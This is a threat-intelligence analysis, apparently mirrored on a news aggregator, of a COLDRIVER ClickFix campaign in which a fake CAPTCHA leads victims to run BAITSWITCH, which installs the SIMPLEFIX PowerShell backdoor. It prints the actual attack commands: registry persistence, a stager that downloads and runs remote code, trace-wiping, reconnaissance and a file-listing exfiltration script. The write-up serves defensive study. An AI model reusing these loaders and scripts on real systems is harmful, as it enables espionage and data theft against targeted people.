惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

G
GRAHAM CLULEY
T
Tenable Blog
Know Your Adversary
Know Your Adversary
C
CXSECURITY Database RSS Feed - CXSecurity.com
P
Privacy International News Feed
S
Security Affairs
NISL@THU
NISL@THU
O
OpenAI News
Attack and Defense Labs
Attack and Defense Labs
Application and Cybersecurity Blog
Application and Cybersecurity Blog
Hacker News: Ask HN
Hacker News: Ask HN
Webroot Blog
Webroot Blog
Schneier on Security
Schneier on Security
S
SegmentFault 最新的问题
S
Schneier on Security
G
Google Developers Blog
V
V2EX
C
Check Point Blog
U
Unit 42
Google DeepMind News
Google DeepMind News
T
Threatpost
阮一峰的网络日志
阮一峰的网络日志
T
The Exploit Database - CXSecurity.com
Recent Announcements
Recent Announcements
M
MIT News - Artificial intelligence
S
Secure Thoughts
博客园 - 司徒正美
Recorded Future
Recorded Future
P
Proofpoint News Feed
Spread Privacy
Spread Privacy
K
Kaspersky official blog
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
AI
AI
博客园 - 聂微东
N
News and Events Feed by Topic
SecWiki News
SecWiki News
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
V
Vulnerabilities – Threatpost
P
Palo Alto Networks Blog
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
Engineering at Meta
Engineering at Meta
Recent Commits to openclaw:main
Recent Commits to openclaw:main
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
酷 壳 – CoolShell
酷 壳 – CoolShell
WordPress大学
WordPress大学
The Hacker News
The Hacker News
The Last Watchdog
The Last Watchdog
Project Zero
Project Zero
W
WeLiveSecurity
博客园 - Franky

Security Research | Blog

ClaudeFix: Shared Claude Chats Meet ClickFix | Zscaler Why Do F1 Teams Need Cybersecurity, and What Is AI’s Role? Indirect Prompt Injection Targets AI Agents | ThreatLabz Splunk Enterprise RCE (CVE-2026-20253) | ThreatLabz Edgecution: Malicious Edge Extension Backdoor | ThreatLabz SmartApeSG Supply Chain Attack Targets Okendo | ThreatLabz AI Generated ClickFix Attack Delivers SmartRAT | ThreatLabz What the ThreatLabz 2026 Phishing and Initial Access Report Means for the Public Sector | Zscaler Shai-Hulud: Miasma, Hades, & AI Scanner Evasion | ThreatLabz Zscaler ThreatLabz 2026 Phishing and Initial Access Report Technical Analysis of MLTBackdoor | ThreatLabz When the Scanner Starts Thinking: Learnings from Mythos & GPT 5.5 Cyber in Security Testing | Zscaler OpenClaw Skill Distributes Remcos & GhostLoader | ThreatLabz Tropic Trooper: AdaptixC2 + Custom Beacon | ThreatLabz Do not delete blog (testing) | Zscaler Payouts King Takes Aim at the Ransomware Throne | ThreatLabz The Alibaba Incident and Why Zero Trust Matters More Than Ever In-Memory Loader Drops ScreenConnect | ThreatLabz Supply Chain Attacks Surge in March 2026 | ThreatLabz Claude Code Leak: Critical AI Security Threat 2026 Latest Xloader Obfuscation Code & C2 Protocol | ThreatLabz CVE-2026-20131: Analysis of FMC RCE | ThreatLabz Technical Analysis of SnappyClient | ThreatLabz China-nexus Group Targets Arabian Gulf Region | ThreatLabz Middle East Conflict Fuels Cyber Attacks | ThreatLabz Dust Specter APT Targets Gov’t Officials in Iraq | ThreatLabz APT37 Adds New Tools For Air-Gapped Networks | ThreatLabz GuLoader Malware Obfuscation Techniques Analyzed GuLoader Obfuscation Analysis | ThreatLabz Technical Analysis of Marco Stealer | ThreatLabz Latest Public Sector AI Adoption Trends: What Government, Healthcare, and Education Security Teams Need to Know | Zscaler Operation Neusploit: APT28 Uses CVE-2026-21509 | ThreatLabz 7 Predictions for 2026 | Zscaler SHEETCREEP, FIREPOWER, and MAILCREEP Analysis | ThreatLabz AI is Now Default Enterprise Accelerator: Takeaways from ThreatLabz 2026 AI Security Report | Zscaler GOGITTER, GITSHELLPAD, and GOSHELL Analysis | ThreatLabz Malicious NPM Packages Deliver NodeCordRAT | ThreatLabz What’s Powering Enterprise AI in 2025: ThreatLabz Report Sneak Peek | Zscaler BlindEagle Deploys Caminho and DCRAT | ThreatLabz Technical Analysis of the BlackForce Phishing Kit | ThreatLabz React2Shell RCE Vulnerability (CVE-2025-55182) | ThreatLabz Shai-Hulud V2 Poses Risk to NPM Supply Chain | ThreatLabz Technical Analysis of Matanbuchus 3.0 | ThreatLabz In-Depth Analysis: Water Gamayun APT Multi-Stage Attack Uncovered CVE-2025-50165: Windows Graphics Component Flaw | ThreatLabz Mobile, IoT, and OT Risks Converge in the Public Sector | Zscaler Industry Attacks Surge, Mobile Malware Spreads: The ThreatLabz 2025 Mobile, IoT & OT Report | Zscaler Zscaler Discovers Vulnerability in Keras Models Allowing Arbitrary File Access and SSRF (CVE-2025-12058) | Zscaler F5 Security Incident Advisory | Zscaler Under the Radar: How Non-Web Protocols Are Redefining the Attack Surface | Zscaler SEO Poisoning Targets Ivanti VPN: Credential Theft Alert Cisco Firewall and VPN Zero Day Attacks | ThreatLabz YiBackdoor: Linked to IcedID and Latrodectus | ThreatLabz Technical Analysis of Zloader Updates | ThreatLabz Mitigating Risks from the Shai-Hulud NPM Worm | ThreatLabz Malicious PyPI Packages Deliver SilentSync RAT | ThreatLabz Technical Analysis of SmokeLoader Version 2025 | ThreatLabz Technical Analysis of kkRAT | ThreatLabz APT37: Rust Backdoor & Python Loader | ThreatLabz Anatsa’s Latest Updates | ThreatLabz Termncolor and Colorinal Explained | ThreatLabz GenAI Used to Impersonate Brazil’s Govt Websites | ThreatLabz Tracking Updates to Raspberry Robin | ThreatLabz Ransomware Surges, Extortion Escalates: ThreatLabz 2025 Ransomware Report | Zscaler China-nexus APT Targets the Tibetan Community | ThreatLabz CVE-2025-53770 | ThreatLabz Black Hat SEO Poisoning Search Engine Results For AI | ThreatLabz
COLDRIVER Adds BAITSWITCH and SIMPLEFIX | ThreatLabz
Sudeep Singh · 2025-09-24 · via Security Research | Blog

Technical Analysis

In this section, a detailed analysis is provided for each component of the attack chain initiated when a victim visits a ClickFix webpage and performs the actions prompted by the site. The figure below provides an overview of the multi-stage attack chain.

Multi-stage end-to-end ClickFix campaign attack chain leveraging BAITSWITCH to deliver SIMPLEFIX.

Figure 1: Multi-stage end-to-end ClickFix campaign attack chain leveraging BAITSWITCH to deliver SIMPLEFIX.

ClickFix / CAPTCHA verification

The infection chain begins with a webpage masquerading as an information resource addressing challenges faced by members of civil society and think tanks in Russia. This webpage employs the ClickFix social-engineering attack method to trick users into executing a malicious command in the Windows Run dialog box by displaying a fake Cloudflare Turnstile checkbox, as shown in the figure below. 

Fake Cloudflare Turnstile checkbox.

Figure 2: Fake Cloudflare Turnstile checkbox.

When the user clicks the checkbox, the embedded JavaScript code copies a malicious command (rundll32.exe \\captchanom.top\check\machinerie.dll,verifyme) to the user’s clipboard. Next, the page displays UI elements designed to prompt the user to paste and execute this command in the Windows Run dialog box. This action executes machinerie.dll (BAITSWITCH) via rundll32.exe, invoking its verifyme export function. While this UI is displayed, the JavaScript code waits for a set timeout before redirecting the victim to a decoy document hosted on Google Drive, created by the threat-actor controlled account narnobudaeva@gmail[.]com. The figure below shows the contents of this decoy document.

Example of a ClickFix social-engineering decoy document hosted on Google Drive.

Figure 3: Example of a ClickFix social-engineering decoy document hosted on Google Drive.

This two-page decoy document describes efforts to build resilience for exiled members of Russian civil society, such as human rights defenders, journalists, educators, and civic activists, through mentorship and fellowship programs.

BAITSWITCH downloader DLL

BAITSWITCH (Machinerie.dll) is a downloader that establishes persistence and retrieves stager payloads to execute the SIMPLEFIX backdoor. It connects to URLs using a hardcoded user-agent string (Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edge/133.0.0.0) to receive and execute commands. The command-and-control (C2) server responds with commands only when this specific user-agent string is used, returning a “404 Not Found” page otherwise.

BAITSWITCH makes five HTTP requests to the threat actor-controlled domain captchanom[.]top to receive various commands and download the PowerShell-based SIMPLEFIX backdoor. For each response from the C2 server, BAITSWITCH uses the lpCommandLine parameter of CreateProcessA to execute the command on the endpoint. Below is the sequence of requests made:

1. The first request to the URL hxxps://captchanom[.]top/coup/premier retrieves a command to establish persistence. This command executes the reg executable, configuring the UserInitMprLogonScript registry key to run a PowerShell script (downloaded later) with a specific argument at the next user logon. Below is the command received:

reg add "HKCU\Environment" /v UserInitMprLogonScript /t REG_SZ /d "powershell -WindowStyle Hidden -ep bypass \"%APPDATA%\Microsoft\Windows\FvFLcsr23.ps1\" \"7eHgxjgbBs3gHdkgx9AsRC\"" /f%

2. The second request to the URL hxxps://captchanom[.]top/coup/deuxieme retrieves a command to store encrypted payloads in the Windows registry. The received command executes PowerShell to add a Base64-encoded, AES-encrypted PowerShell script (stored in $ii) and a Base64-encoded AES decryption key (stored in $iii) to the Windows registry keys EnthusiastMod and QatItems, respectively. This encrypted script will be decrypted and executed in subsequent stages. Below is the command received:

powershell -c "$ii = 'kXvyDMF+...iL54E0QbEXJyRA==';$iii = 'yuClT3Iwhv9SERwcmKipg=';$rrr = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{53121F47-8C52-44A7-89A5-5595BB2B32BE}\DefaultIcon';if (-not (Test-Path $rrr)) {New-Item -Path $rrr -Force};try {$rrrr = [System.Text.Encoding]::UTF8.GetBytes($ii);Set-ItemProperty -Path $rrr -Name "EnthusiastMode" -Value $rrrr -Type Binary;$rrrrr = [System.Text.Encoding]::UTF8.GetBytes($iii);Set-ItemProperty -Path $rrr -Name "QatItems" -Value $rrrrr -Type Binary;}catch {}"

3. In the third request to the URL hxxps://captchanom[.]top/coup/troisieme, BAITSWITCH downloads a PowerShell stager from a different server (southprovesolutions[.]com/FvFLcsr23) and saves it to the path %APPDATA%\Microsoft\Windows\FvFLcsr23.ps1, referenced earlier in the persistence setup. Below is the command received:

powershell -c "Invoke-WebRequest -Uri \"hxxps://southprovesolutions[.]com/FvFLcsr23\" -OutFile \"$Env:APPDATA\Microsoft\Windows\FvFLcsr23.ps1\""

4. The fourth request to the URL hxxps://captchanom[.]top/coup/quatre retrieves a command to clear the RunMRU registry key. The RunMRU key stores the Most Recently Used (MRU) commands entered into the Run dialog (Win + R). Since the ClickFix attack begins with the user pasting the malicious command into "Win + R," this action effectively erases any trace of the attack. Below is the command received:

reg delete HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

5. In the fifth and final request to the URL hxxps://captchanom[.]top/, BAITSWITCH sends the victim’s hostname to the C2, possibly to register the victim with the C2 server. No response was observed from this URL.

PowerShell stager

On the next Windows logon, the PowerShell stager executes with the command-line parameter 7eHgxjgbBs3gHdkgx9AsRC, as specified in the logon script registry key. 

This script uses basic string obfuscation techniques:

  • Multiple Base64-encoded strings are decoded, transformed, and concatenated to construct the decoded PowerShell script.
  • After decoding, each Base64-encoded string undergoes the following transformations:
    • Replace all newline characters with semicolon characters.
    • Delete all non-ASCII characters ([^\x20-\x7E]).
    • Delete all 2-byte hex-encoded characters ((?i)x[0-9A-Fa-f]{4}).

Below is the deobfuscated PowerShell-based stager.

function WWW($value) {
   $scriptBlock = [scriptblock]::Create($value); & $scriptBlock
};
function WWWWW {
   param([string] $eeee, [string] $eeeee);
   try {
       $eee = [Convert]::FromBase64String($eeee);
       $eeeeee = $eee[0. .15];
       $eeeeeee = $eee[16..($eee.Length - 1)];
       $e = [System.Security.Cryptography.Aes]::Create();
       $e.Key = [Convert]::FromBase64String($eeeee);
       $e.IV = $eeeeee;
       $ee = $e.CreateDecryptor();
       $eeeeeeee = $ee.TransformFinalBlock($eeeeeee, 0, $eeeeeee.Length);
       return [Text.Encoding]::UTF8.GetString($eeeeeeee);
   } finally {
       if ($e) {
           $e.Dispose()
       }
   }
};
$wwwwww = Get - ItemPropertyValue - Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{53121F47-8C52-44A7-89A5-5595BB2B32BE}\DefaultIcon' - Name 'EnthusiastMode';
$wwwwwww = Get - ItemPropertyValue - Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{53121F47-8C52-44A7-89A5-5595BB2B32BE}\DefaultIcon' - Name 'QatItems';
$key = $global: wwww + [System.Text.Encoding]::UTF8.GetString($wwwwwww);
$wwwwwwww = [System.Text.Encoding]::UTF8.GetString($wwwwww);
$w = WWWWW $wwwwwwww $key;
WWW - value $w;

The stager has the following functionality:

  • Reads the Base64-encoded and AES-encrypted PowerShell script from HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CLSID\53121F47-8C52-44A7-89A5-5595BB2B32BE}\DefaultIcon\\EnthusiastMode.
  • Reads a string from HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CLSID\53121F47-8C52-44A7-89A5-5595BB2B32BE}\DefaultIcon\\QatItems.
  • Concatenates the command-line parameter and the string from the registry to form the full Base64-encoded AES key: 7eHgxjgbBs3gHdkgx9AsRCyuClT3Iwhv9SERwcmKipg=.
  • The PowerShell script is decrypted using the first 16 bytes of the Base64-decoded blob as the initialization vector (IV) and a 32-byte decryption key. Below is the resulting decrypted script.
$ia = @("southprovesolutions.com");
$fff = $false;
while (-not $fff) {
   foreach ($iii in $ia) {
       if ((Invoke-WebRequest -Uri "https://$iii/" -UseBasicParsing -Method Head -TimeoutSec 5 -ErrorAction SilentlyContinue) -ne $null) {
           $wc=New-Object System.Net.WebClient;
           Invoke-Command -ScriptBlock ([scriptblock]::Create($wc.DownloadString("https://$iii/Zxdf")));
           $fff = $true;
           break;
       }
       else {}
   };
   if (-not $fff) {
       Start-Sleep -Seconds 5;
   }
};
  • This decrypted PowerShell script fetches the SIMPLEFIX backdoor from the URL hxxps://southprovesolutions[.]com/Zxdf.

SIMPLEFIX backdoor

SIMPLEFIX employs obfuscation techniques similar to those employed in the stager PowerShell script. The resulting deobfuscated script is available in the ThreatLabz GitHub repository.

The script enters a loop to execute the following steps every 3 minutes:

  • Generate a user-agent string by combining the computer name, username, and the machine’s UUID (retrieved using WMI). This user-agent string is used for all communications with the C2 server.
  • Send a request to hxxps://southprovesolutions[.]com/KZouoRc and parse the response for commands to execute.
  • After each command is successfully executed, an HTTP request is sent to hxxps://southprovesolutions[.]com/VUkXugsYgu, likely to notify the C2 server of the successful command execution.

SIMPLEFIX supports the commands outlined in the table below:

Command

Description

1

Retrieves a URL hosting a binary and a command-line parameter used to launch this binary. If a filename is included in the URL, the binary is dropped with the same filename in the %temp% path. If no filename is included in the URL, the hardcoded name AkdD2sS.exe is used instead.

2

Retrieves a set of commands to be executed on the user's machine. At the time of analysis, the commands received were used to collect information about the system, network, and user. The output of these commands is sent in an HTTP POST request to hxxps://southprovesolutions[.]com/EPAWl.

3

Executes a PowerShell script and sends the command output via an HTTP POST request to hxxps://southprovesolutions[.]com/EPAWl.

Table 1: Commands supported by SIMPLEFIX.

At the time of analysis, the commands in the following table were received:

ID

Command

Description

2

whoami /all & ipconfig /all & systeminfo & net share & net session & ipconfig /displaydns & query session & net user & netstat -ano & arp -a

Commands for reconnaissance, including gathering information about the user, network configuration, and system.

whoami /all

Collects information about the user.

3

[string[]]$di = @('Documents','Downloads','Desktop','OneDrive');[string[]]$fi = @('.pdf','.doc','.xls','.txt', '.zip', '.rar', '.7z');$r = [Environment]::GetFolderPath('UserProfile');$tr = [System.Collections.Generic.List[string]]::new();function PD { param([string]$p); try { $md = $false; foreach ($i in $di) { if ($p -like "*${i}*") { $md = $true; break }};if (-not $md) { return}; [System.IO.Directory]::EnumerateFiles($p) | ForEach-Object { foreach ($f in $fi) { if ($_ -like "*${f}*") { $ii = [System.IO.FileInfo]::new($_);$tr.Add("[File]  $_ $($ii.Length) $($ii.LastWriteTime)`n");break;}}};[System.IO.Directory]::EnumerateDirectories($p) | ForEach-Object { PD $_ }} catch [System.UnauthorizedAccessException] {} catch {}};[System.IO.Directory]::EnumerateDirectories($r) | ForEach-Object { PD $_ };$tr;

PowerShell script that exfiltrates information about a hardcoded list of file types found in a pre-configured list of directories. The file types correspond to documents and archives that may be of interest for strategic intelligence collection.

The list of directories and file extensions scanned are very similar to the LOSTKEYS VBScript-based malware used by COLDRIVER in January 2025.

exit

Terminates the SIMPLEFIX backdoor.

Table 2: ThreatLabz observed these commands being sent to the SIMPLEFIX backdoor.